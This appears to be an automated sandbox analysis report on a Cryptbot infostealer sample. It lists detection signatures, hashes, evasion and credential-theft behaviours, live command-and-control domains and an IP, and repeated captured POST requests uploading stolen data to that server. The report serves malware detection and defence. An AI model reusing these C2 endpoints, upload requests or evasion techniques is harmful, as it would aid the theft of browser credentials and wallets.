Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561522
MD5: b2f438ad921eb76747a1099a6186c8a8
SHA1: 18feb49a9e30fe0c712302de00752c951437b257
SHA256: 305179e8891cd27285974ffee3acd9a46d94b622f977ad54b14626db7954c9b9
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17320193474fd4 Avira URL Cloud: Label: malware
Found malware configuration
Source: file.exe.7004.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fvtekk5pn.top", "fvtekk5pn.top", "AgPhome.fvtekk5pn.top"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_008C15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0B14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0B14B0
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_4a2acd9e-f
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_008C81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0D0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0DA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 2Ch 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0DA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0DA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C18F960h 8_2_6C0CEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1584A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0D44B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0DC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0DA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0DA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0DA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0DE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0DE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C150730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0D0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C10A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0D0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C18D014h] 8_2_6C184360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C127D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C123840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C0DD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0EBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0EBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C12B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0DD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C129600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C0DD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C18DFF4h 8_2_6C123690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C0DD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C153140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0CB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0DD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C147350
Source: chrome.exe Memory has grown: Private usage: 8MB later: 23MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49765 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49766 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49750 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49749 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49744 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49741 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49742 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49743 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49767 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49746 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49747 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49764 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49745 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49763 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49748 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Source: Malware configuration extractor URLs: fvtekk5pn.top
Source: Malware configuration extractor URLs: AgPhome.fvtekk5pn.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb--
